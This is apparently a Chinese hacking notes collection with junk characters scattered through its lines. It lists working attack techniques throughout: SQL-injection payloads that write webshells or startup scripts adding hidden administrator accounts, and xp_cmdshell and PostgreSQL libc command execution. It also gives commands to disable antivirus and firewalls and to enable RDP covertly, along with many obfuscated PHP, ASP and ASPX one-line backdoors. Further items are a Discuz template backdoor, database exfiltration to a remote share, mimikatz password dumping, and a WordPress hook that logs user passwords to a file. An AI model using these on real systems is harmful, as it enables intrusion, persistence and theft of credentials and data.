$ }6 @; ?/ w( M! D; eSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a5 I0 g9 G, A% a; P
access中导出shell7 s4 F' s- c9 ]
0 w2 v& B& G( m) D
中文版本操作系统中针对mysql添加用户完整代码:; R3 ^2 R$ W, o  T

- t/ S  A6 L* P) N# k4 s& t/ u) _use test;* E9 ?1 U; B' B/ K
create table a (cmd text);4 A; ~& K; |- Y8 H( `
insert into a values ("set wshshell=createobject (""wscript.shell"") " );: O% T/ x: x' w! t9 L
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
( m% W$ p! p( \+ `# rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );8 ~3 i$ f5 f' q" P
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";5 C* u1 s, Y0 D. k' z2 ^3 r. l
drop table a;+ A+ E( c8 }8 k  \$ \

* j3 s; q1 x+ e6 M3 K! w! M4 V英文版本:6 V/ t( s1 u) k5 T  v

% ^! C" a+ o) Q  q2 H: huse test;2 j' l+ g& g( ^  p
create table a (cmd text);
5 r4 ?3 l6 j+ H: n3 o& A6 \' Yinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 |. q! X# _. |( {( {insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) f. t+ S  p: l- ^4 k* }, z9 Sinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. }/ ^1 M3 V( _) ~) C9 f, q) g& \# j
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";$ d5 r5 l# ?# u- y$ X
drop table a;' ]1 @7 j7 x3 h" l( {

  w; e. U- n0 z% @8 screate table a (cmd BLOB);5 R( X/ X1 [' }5 N! ]# e
insert into a values (CONVERT(木马的16进制代码,CHAR));6 H1 R7 L% ?$ E5 ]1 B4 t$ S
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe') X1 r. F* `. _9 X. Y( T
drop table a;: P8 r* J0 k. h5 h: h; S/ i

2 n; f) W8 e- Q# o记录一下怎么处理变态诺顿
/ D$ v( w" f8 T( ?0 i查看诺顿服务的路径
3 B3 r0 H  v4 d( k+ m9 R6 x% msc qc ccSetMgr- d( U' I1 Q# g; M7 S) w5 H
然后设置权限拒绝访问。做绝一点。。. A3 b: p! \1 b" K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system6 B1 m4 l+ Y6 p4 E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"/ t% d* C+ m% B2 N9 v% }8 e; i! q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& ^. l( m4 g. F' C) J+ }
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
- j4 w) x! s0 }5 R2 @! q
' C# x8 l: Z9 O5 ~  R然后再重启服务器
3 l) C9 U+ y' k) [( x2 ciisreset /reboot
, q0 q" o2 t7 U- F- G这样就搞定了。。不过完事后。记得恢复权限。。。。4 A. P, ]9 |. C0 c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F3 \9 O$ r; e) m
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
% a7 t) H, L+ ?, u! X& Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F; Y" m5 D3 D/ P7 ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
' L* |+ k/ w4 v0 t% o. sSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
- D* I7 A- ^  ~8 N: \1 U) t5 B9 c% Q$ `7 ?7 ~  j8 V$ f7 k
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')! ^0 \% ]$ m( l, [4 f
5 y" e( }( Z0 G; @
postgresql注射的一些东西
4 b: q9 _3 i' N$ @9 L7 ~, l! l# u" q如何获得webshell
5 a( [& G; `( `1 ~: ~2 H; s/ yhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 5 |& `2 ?6 q' H! G; \1 [
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); . J' ~% V  a" J# t
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! s8 ?. w1 I' `  f, F' c如何读文件
! b) K) R8 H7 F4 uhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 o* k/ d: o& U8 ~- ohttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
, l" x# [. J9 v/ Y1 |http://127.0.0.1/postgresql.php?id=1;select * from myfile;
; R/ w* H+ ]: c; d, K$ h& I
" ~7 I2 {; I1 H; ?) zz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, |7 F0 r+ U$ m- v, x' H6 A3 X
当然,这些的postgresql的数据库版本必须大于8.X
4 t7 G' [; K0 i- d% X创建一个system的函数:4 [3 W, v  n0 H6 Y+ p# W0 x
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; D- W- c  \' @& G4 G5 e5 B  x9 \3 Q

# k6 D; S8 d7 T( H创建一个输出表:
9 p# i5 w& B6 z6 B4 K1 {CREATE TABLE stdout(id serial, system_out text)
) G+ ], A, B6 Q! v" X7 z" o
4 Z; \1 j* g9 Y执行shell,输出到输出表内:: b* q( ^# _, i+ c3 m
SELECT system('uname -a > /tmp/test')- T9 U# ~" I" i& ~

# K% I* V$ w2 @6 c, \! Q+ Dcopy 输出的内容到表里面;
6 N: x# Z4 z9 N" QCOPY stdout(system_out) FROM '/tmp/test'* w- s5 ]4 b) X* J9 v
3 U* S" Y( K1 m: Y) c: P* z
从输出表内读取执行后的回显,判断是否执行成功" P5 P( w$ j  z, _9 `+ O

0 W4 t5 G% c- GSELECT system_out FROM stdout
* ~+ |1 _  `  L+ @6 l/ S4 @  s下面是测试例子
3 m- T" w# g* t8 N- e& K% O  B
7 b2 E; ~) w( E. M1 q8 y/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
8 v- b* i$ R0 H- H0 p1 `2 l: S) W' E7 ]- e5 B' u: C
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
( o' A" C+ A  q5 QSTRICT --% n0 [/ I, W& e

' R0 c3 f$ w( B# L3 [& n0 B/store.php?id=1; SELECT system('uname -a > /tmp/test') --
: z, {$ b: `/ l) g4 x' Z+ U$ ]( ]
, A7 R( q5 U4 i) w+ w5 |6 D/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --3 ^5 u8 _% I4 y. o* h0 z  Y* E. s+ z

+ C. L6 G$ {: h/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--9 W3 W+ m9 ^; r+ E1 p8 v
net stop sharedaccess    stop the default firewall
! h* F. P+ z! L) `4 j: Q% Tnetsh firewall show      show/config default firewall9 S+ {0 U/ b2 K2 C6 x0 `0 Y! }
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
3 {5 m/ R+ A# L. Jnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall9 {/ v- l/ |7 j# K
修改3389端口方法(修改后不易被扫出)
: o2 |5 B6 F& @修改服务器端的端口设置,注册表有2个地方需要修改1 u- I9 {3 C" T& e8 c
3 k9 I( }3 F2 P6 |  \7 q* V
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
. w0 C; ?$ U8 O, |# RPortNumber值,默认是3389,修改成所希望的端口,比如6000
% Q& c% [6 V7 O" V& V7 [  `1 x" Z4 V4 Q
第二个地方:
, M9 x, }2 I! C/ I4 J) m[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
( w0 d" @9 _" ~( JPortNumber值,默认是3389,修改成所希望的端口,比如6000
5 f$ T( u2 V( I6 j. f7 K( }
2 e$ J( B9 e% o9 ?; ^现在这样就可以了。重启系统就可以了
& l5 \: e* v/ V- ^. b! p0 u6 u; T& g1 F" y7 f: i9 H6 c( @
查看3389远程登录的脚本1 p& X  c; K, E/ b" M4 o) N. u/ u
保存为一个bat文件
, w" N2 e5 N4 l. \) Q! n8 R( xdate /t >>D:\sec\TSlog\ts.log
; u0 q+ e9 T* E- {- p$ d; htime /t >>D:\sec\TSlog\ts.log: A+ J$ |* I+ ?/ H. q1 \3 ^
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
! k! [5 F4 y* x) \: Y. c( xstart Explorer
+ X( |4 |! i0 f. a. {! X6 C, k/ I# ^6 O1 l
mstsc的参数:  d/ B9 m! I. x3 j

# s# ]/ Z! D3 ^5 q! v0 {: J5 f远程桌面连接$ k5 m; O; k* m. f3 A" s) [

7 P9 n; L$ b  rMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
2 _7 C. Y% f  w5 c7 i0 K  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?6 u- ^  N* A/ d
& _5 Y( n: W) e2 v
<Connection File> -- 指定连接的 .rdp 文件的名称。
& r, z. \, _8 U" k9 l6 T0 E, p# o% I! A& w$ P4 ?5 w# f
/v:<server[:port]> -- 指定要连接到的终端服务器。( b0 o* s! t$ q5 K2 [& F% z
& a; k5 P4 `' O5 R- m* {/ O
/console -- 连接到服务器的控制台会话。
$ |& N; l! q2 z% G' Z6 U3 d$ n
. {; b7 J8 e+ R* Q/f -- 以全屏模式启动客户端。* J/ @8 x' T; h, c1 ?$ {
4 o& u1 U9 n- H3 l. J6 M2 J6 C& I
/w:<width> --  指定远程桌面屏幕的宽度。
( _8 N& ~: K$ r7 A+ e
% o& c2 S/ R( ?9 ?9 T/h:<height> -- 指定远程桌面屏幕的高度。( H# c. X/ i  |5 C, T9 |4 R
" T( Y( @: w7 `7 S2 w! c( _
/edit -- 打开指定的 .rdp 文件来编辑。
# c1 A; h' D3 X0 t7 R" N/ m, h9 l8 M( j
/migrate -- 将客户端连接管理器创建的旧版1 c3 _7 B, C5 m- e" U8 ^
连接文件迁移到新的 .rdp 连接文件。
5 }4 m4 `$ a# E; r' U7 f
1 V: n, j) }0 o$ @4 b# P9 |; Q1 q* O0 K: Y: |" _
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就: I5 J$ N9 r7 l' l
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
- ^) @" [& Q& B/ R! q: a9 C& a, X( H' M. Z- \
命令行下开启3389  B. N7 [, Y; w( ?, g# M; ^/ r
net user asp.net aspnet /add
+ L( {  ~9 K2 F* W3 Q# t% u# }net localgroup Administrators asp.net /add
, s  g3 r" ?% M. }net localgroup "Remote Desktop Users" asp.net /add
, v0 B. s: M* t6 ]attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
0 O) Z! u% [6 b2 H1 |2 p5 necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
9 ]& U: b! H; T  yecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 19 w5 A8 Z* e5 H" i8 p
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f# G) d! G& _* a8 u
sc config rasman start= auto! E# Y# z# t3 y/ T3 l6 J2 T7 t8 @* ^2 m
sc config remoteaccess start= auto* p; `; s4 S" _6 t* o
net start rasman% l: b( A9 }# @" u2 A* u, W
net start remoteaccess
1 `/ H5 A- y3 k5 VMedia
: B, N2 d7 U! b7 Z- B- O) Q<form id="frmUpload" enctype="multipart/form-data": m8 M- P5 A# C, e+ b+ a
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
9 ^; C. R) o6 z# U+ a<input type="file" name="NewFile" size="50"><br>& [% ^) R; n% o, G* m
<input id="btnUpload" type="submit" value="Upload">! |. K5 v( E$ m7 C2 z# a0 f
</form>
) L; q) J9 H2 h; ]4 U& M' M% ^* I; w* N+ N3 r, s8 V
control userpasswords2 查看用户的密码% j8 z8 i$ u5 l9 g8 X) c
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
2 i! R6 N3 d# xSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a' a) h8 s' x, l' v
- n! B! I$ |- Q( l4 C  T
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:5 ]# r8 \" c; {: `" S8 c9 T
测试1:- G3 l. S- O0 S/ T4 b( @/ ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
1 o' |4 n% T& g, R3 U: h
1 _3 o% k8 ^" F测试2:* I; x  u9 h4 i5 N1 h

# \( C3 {3 R( U9 M, ecreate table dirs(paths varchar(100),paths1 varchar(100), id int)+ G: Y) O2 R6 q9 ^6 h" t! ~
: U+ d# H& G+ W
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--9 p+ Q. x$ j; T; Z' Q

! c" d& Y2 e" d3 Z4 |# pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
& F1 \* f( Q4 {) ?关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令( e7 Y: o1 v( Z4 u3 I2 t
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
4 B  L( h) P' i4 ~5 l% Z6 ?8 snet stop mcafeeframework
9 t$ o- b) Y8 k8 a2 ~net stop mcshield
5 B. {# U! s7 }" `% g8 pnet stop mcafeeengineservice
# [, ^* Q4 I6 ]# d% O, M0 h  P9 V) lnet stop mctaskmanager- c. p; W" W/ C
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D8 `3 O1 X8 D9 v2 Q
0 G1 [3 P& }# y0 g% a0 T
  VNCDump.zip (4.76 KB, 下载次数: 1) 8 R+ R/ r* f9 u. w. r+ O) q$ [! C7 R
密码在线破解http://tools88.com/safe/vnc.php/ {7 o4 V1 ?) H- @% m
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
3 o8 ^: ^  p& F  A& Y
6 N0 Q4 z0 h, t' mexec master..xp_cmdshell 'net user'
3 w7 U7 ?% j% K9 b# o% Imssql执行命令。
+ `, h0 r' C+ x" F/ _4 f9 a1 V) |: i获取mssql的密码hash查询; H# G7 J# Y: s) g. a4 Z
select name,password from master.dbo.sysxlogins
5 H& V/ c1 t' `' {3 g# ~0 e% ~; C6 S7 m
backup log dbName with NO_LOG;+ a# F4 x+ d; w" O& e
backup log dbName with TRUNCATE_ONLY;
  |$ |6 F2 u9 G$ l& f0 J: eDBCC SHRINKDATABASE(dbName);
& z: |2 w) r/ P! ~mssql数据库压缩! e  {- C  _9 P/ s3 R; q# P
$ {9 g5 \- O/ S- S: `
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
& c& s/ [( _2 ]( x6 c& j将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 @3 i6 T/ h- u; c7 u

/ H: b1 p  r/ M" E3 mbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ [, i; V, I* J( k# s( L( |8 C% `备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak/ |. ]# T' Z5 a
0 w; a9 v9 J' h  r) _+ c' d
Discuz!nt35渗透要点:
4 U3 _, S" w* L3 X% e& D( }- ?6 p(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default7 R1 B# e" b4 [
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
' U8 A2 @/ r; p. Z; b* I(3)保存。: B# }3 Z& V3 a5 ^3 Q3 L
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ ]' M" K# f$ s+ L& f
d:\rar.exe a -r d:\1.rar d:\website\
0 Z0 E( }* V# `  @. h- h递归压缩website; ?! ~5 e$ U' {9 r' S: s; P" {( R
注意rar.exe的路径
5 p; H6 K% w7 \7 r! x# u0 t* H
8 s" \6 D$ @, K* a1 E  `8 A<?php
8 l! m3 q; T2 q: g  X3 R/ c$ n; A0 b+ }! L- ^! G
$telok   = "0${@eval($_POST[xxoo])}";" a0 X6 C1 \0 h0 k

" B/ q3 [7 F% c0 D$username   = "123456";; j1 F! \2 r( ?8 j" y8 Z: R1 Q1 ]8 X
, C( j8 a. k  w
$userpwd   = "123456";
" [& @" ~9 q% I4 S* P/ G& j9 n7 G1 ]" O: [0 ?
$telhao   = "123456";
- B! f7 _4 p9 P) c; f
! c( H' i# r- e$telinfo   = "123456";& f) e" X) H9 w! |

& T8 ^0 l. H3 ?5 b?>' Q1 T: ]9 F. K: L$ z& n
php一句话未过滤插入一句话木马
" O* ^2 N% V. S# ^# W0 ?4 b8 o3 j) m9 r' L
站库分离脱裤技巧
- E( w9 w  o  \exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'6 Z* |9 Q$ J& S  f; ]
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
0 U6 e' P4 Z# v$ j条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。" C% I1 d8 o8 p7 m2 n* ?! a+ Z
这儿利用的是马儿的专家模式(自己写代码)。' ~& z! \( {' J, T
ini_set('display_errors', 1);9 A0 N: M7 i* A, D
set_time_limit(0);6 x) _# r$ p; |/ f
error_reporting(E_ALL);
- E2 E9 a2 v! @8 E8 `/ c$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());) V- E( ?( d& t. t: C8 }2 ^
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
8 L+ P% E/ X' L( P3 O/ N( R$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
: Y: ]3 I, }+ o) }- b# K9 j$i = 0;
, r6 s& K% X! P. A! H( {, H0 l# k+ H$tmp = '';( t+ n  E* @/ B: }
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {/ C2 ]! l5 n: k$ r! J8 R8 P; I3 I
    $i = $i+1;
# f# b* A( T# l( q. {% z    $tmp .=  implode("::", $row)."\n";3 |4 O- Z5 c2 E, y2 X; F2 x
    if(!($i%500)){//500条写入一个文件* Y, K& f+ H- W! a& _
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
$ v8 ?$ S0 ]# Y4 W' ?7 v        file_put_contents($filename,$tmp);
/ Y/ Z3 O8 I' _" C! L' Z7 g9 r        $tmp = '';# N, _* k6 y5 w7 [
    }# K) f$ o( G+ B! K
}( l' S3 b1 n6 d' x! e; i, }3 N9 y
mysql_free_result($result);5 K" B: g* W, F; H/ z
# i3 @( m* d9 U& [1 E: B9 E
) d& H/ U, O4 V  h& ^

8 Y  u0 Z8 |$ T//down完后delete4 {$ s( b5 O/ N2 Y0 @& ^+ w
/ g/ ]6 m' [" b+ ?
8 [! v; r4 h& K7 p- O
ini_set('display_errors', 1);
. h' o4 U0 e% G. terror_reporting(E_ALL);! P& R$ @% B- L: P7 O
$i = 0;
# I8 F; i7 O) N! _* F& w5 ?" ^2 _while($i<32) {
, d' P/ B: r2 Z) \# D' H    $i = $i+1;
6 Q. ~' _$ f+ k) {) f5 ~        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';4 Q/ }+ ?) G: }& h
        unlink($filename);" y# w; X7 u9 k6 Y
}
; Y3 _8 f3 e( j; t) xhttprint 收集操作系统指纹
- b! W6 W7 T; J: N! i扫描192.168.1.100的所有端口
2 K/ o2 r4 H8 Mnmap –PN –sT –sV –p0-65535 192.168.1.100
& y+ y, |/ F1 l7 Qhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
" @( B/ c. E2 C  uhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
, m! y% T# }- QNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
5 G+ Y6 v: i  D0 T5 v/ d" Y6 I. g0 o, Z1 |2 `7 ]  s2 {5 [: j
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# J5 R  u) `( x: |2 B( V& W  u# |. f% O" X
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
5 ]- z8 _: k; z6 V
. T& Q- j9 _" q5 Q! W7 j" r  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
# O8 Y6 [" D- T" m
  |8 a4 v' v1 Q: R; E  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
: }8 Z1 `% T' a5 D! g+ `/ `4 j$ m9 Y. ?6 d) m
  http://net-square.com/msnpawn/index.shtml (要求安装); q2 p4 `- n8 f, z
' S6 J1 a% I5 |9 s
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
4 L7 [# j9 o% B4 k3 V+ w. {- l2 |) M% P& ]5 H) _/ C
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)6 b" }- W9 z; `  S! \7 T$ y6 _
set names gb2312
8 z5 Z! k3 d/ o1 Y6 k2 A# f  T- r导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。, S  g+ O; |1 X7 X. Y4 q; a

! w2 D& P1 a! e. G' L# [mysql 密码修改
  W5 i$ I8 [0 }4 g- U. WUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” / Q3 q2 N- v5 B7 B& G* b" D
update user set password=PASSWORD('antian365.com') where user='root';
  ]( j( N- s+ k; h, qflush privileges;
+ h: `& K3 C, v9 V( f高级的PHP一句话木马后门3 O% S  K  g" Q

( O8 A( z  N* p7 T! ]1 _入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀& M: V' `& b1 W0 Z1 S8 T( N

" Z9 b) b3 Z- |! s* X/ u1、3 K" p6 l3 r! E' }% O' X- w
+ Q0 ^5 A) e: U% ~, b4 j
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* i7 W% p0 ^" x# T; {4 N, z% i/ L$ p9 F6 [, d
$hh("/[discuz]/e",$_POST['h'],"Access");% W0 Y8 W( M* k4 i9 }9 N
( q/ l9 ]6 n  l2 P. r; t* A% I
//菜刀一句话
5 m9 @3 G- t. [7 ~1 I
% M. ]7 o, y& U. S6 u4 [2、
/ B- F* x; a: N- D, I  m
' z$ R0 p" b% X, C% n$filename=$_GET['xbid'];0 l; J3 ~2 F) x% ^. `3 n4 i

: l. g: n4 q* _7 minclude ($filename);
9 c7 R4 e5 l/ S7 N+ ]
* J4 }5 L7 q# t6 K. l2 t//危险的include函数,直接编译任何文件为php格式运行; ?8 ]! p- ?0 w: B* U6 d. v1 S
. ^' M# \, m/ h( O+ \& I5 Q+ Q8 P2 T9 d
3、
, t& r( a0 C8 B% S9 F
7 h8 n: d+ h7 v. b$reg="c"."o"."p"."y";/ \, `. m, s9 Q. a; u
, l) N& S3 y; u! B9 i6 ?$ f, W6 h
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
& Q  N3 G5 N' h$ a0 ?
/ p# \6 a1 P" @- i8 F/ P//重命名任何文件
8 x8 j# V4 T4 R- M$ O0 i
' L2 T5 ~$ a% K( g, j4、
/ Q; q8 Q3 A5 f- I) s& R9 }+ _
9 u- u% a* o$ P# R+ [) \' J. q$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
) J* e  k' _* q- }* U, I4 e! ~* a- j% \
$gzid("/[discuz]/e",$_POST['h'],"Access");
* j1 m2 x6 O9 h  [9 j" `. v7 m# R* t% _& U1 G9 H
//菜刀一句话( \; x3 v# y- i' j* ]) A
& d9 V) O, Z0 X. H! D. @0 Z  u5 q# U
5、include ($uid);
9 {& M; A# ^8 p; m% r, M* @- m# v9 D8 q* s: t! K; k! O
//危险的include函数,直接编译任何文件为php格式运行,POST ( G. ^& P2 U- n
# ~4 ^5 ]4 G" L5 G! j

- r/ m8 Q* j$ ~//gif插一句话
" |6 I7 T$ z- P$ Z3 }  |7 j7 w. }; @9 o
6、典型一句话
, [! u7 D9 ]- L9 Z
. V7 z8 _8 B* h8 u3 Y0 F程序后门代码
* s* b1 S/ h: P% F<?php eval_r($_POST[sb])?>( C9 s  i  E, V! `5 m: Q; R
程序代码
% L; y+ e5 I1 A$ c<?php @eval_r($_POST[sb])?>
4 ^7 M/ x# A* m+ S) s8 X% I4 I6 w//容错代码& m/ p4 S" P/ h9 L3 B* i1 ^" F
程序代码
% G# V; L0 M* Q+ y<?php assert($_POST[sb]);?>: M4 s3 {# W8 g
//使用lanker一句话客户端的专家模式执行相关的php语句1 E' v+ s3 ~& K( v. T
程序代码, I/ y) l5 L8 c
<?$_POST['sa']($_POST['sb']);?># {, ?6 y8 e5 ^8 z  o4 y2 e
程序代码+ w9 w& Q/ r# i0 ?. D
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6 {$ u* {& L/ c程序代码
& y3 l4 L# Y8 P<?php
# m6 V" G9 }3 i$ U@preg_replace("/[email]/e",$_POST['h'],"error");
7 ?# v/ T% i' O+ @2 _) e& }$ P?>
' t3 V9 a; r0 ~. m# ?//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
2 L* ?8 F7 z4 H. ^# c& H9 p程序代码1 P$ ^8 [' o8 ~; C
<O>h=@eval_r($_POST[c]);</O>
9 j+ g9 Y- V" p% a& S# S程序代码3 k8 B4 |* C! O& F
<script language="php">@eval_r($_POST[sb])</script>
, F" h# ~5 t2 V: U: C//绕过<?限制的一句话
& ?: h$ T9 \5 ^( n' J
; a- `. g/ m' s$ n: zhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip' U: o9 c0 U5 m7 n. D
详细用法:7 o. m6 P7 d9 z6 h9 `( d" R5 h& E" B
1、到tools目录。psexec \\127.0.0.1 cmd
: ]1 s% d; t; N( M6 u0 S2、执行mimikatz$ b; R) d- G4 |2 v
3、执行 privilege::debug
1 o8 Z9 m( g" ~4、执行 inject::process lsass.exe sekurlsa.dll& h4 f1 o# ?3 A: \7 v$ X
5、执行@getLogonPasswords
) _, q5 V& b  l& r3 s6、widget就是密码" S3 \( E1 n; x' ?6 L7 r  {
7、exit退出,不要直接关闭否则系统会崩溃。
4 }' f9 c8 ?! _5 W% g9 }8 [( X4 f6 [& @" }% `; f8 s2 \
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面  d. l- z3 `5 E4 G
  q, e0 O( C5 V9 Z/ H4 D3 r5 m
自动查找系统高危补丁/ J! m  |8 o* u' K( `! h' z- o; j' ?" Y
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: r, Q( ?( y/ w8 M# k
4 L& d* J# P5 S突破安全狗的一句话aspx后门( v2 ?; _9 N4 m. m1 K/ U
<%@ Page Language="C#" ValidateRequest="false" %>
& X% m# W2 G- r. r6 B  D<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
; K, Q8 B, W  R8 q# O# x2 M# I0 [( I- Qwebshell下记录WordPress登陆密码3 f6 p; J. |  T% M. _4 }
webshell下记录Wordpress登陆密码方便进一步社工
3 Q8 ?; [- {0 R! w在文件wp-login.php中539行处添加:
# W" V6 ^. d$ e! |: q4 X// log password" R9 o' j' C+ ~
$log_user=$_POST['log'];
) t4 m5 ?, Q# H4 p$log_pwd=$_POST['pwd'];
7 B9 y; E4 T7 t5 l- q, z* y$log_ip=$_SERVER["REMOTE_ADDR"];
& T7 u4 f! I3 b- }: A0 V. q1 n. F2 N$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
9 [# C4 Y, D9 D" u! i$txt=$txt.”\r\n”;
3 Y6 {2 M4 a/ Tif($log_user&&$log_pwd&&$log_ip){1 |! t* N! K7 u+ q- R2 {% [% w' Q
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);* m. P+ L! W- B5 V: b7 c
}
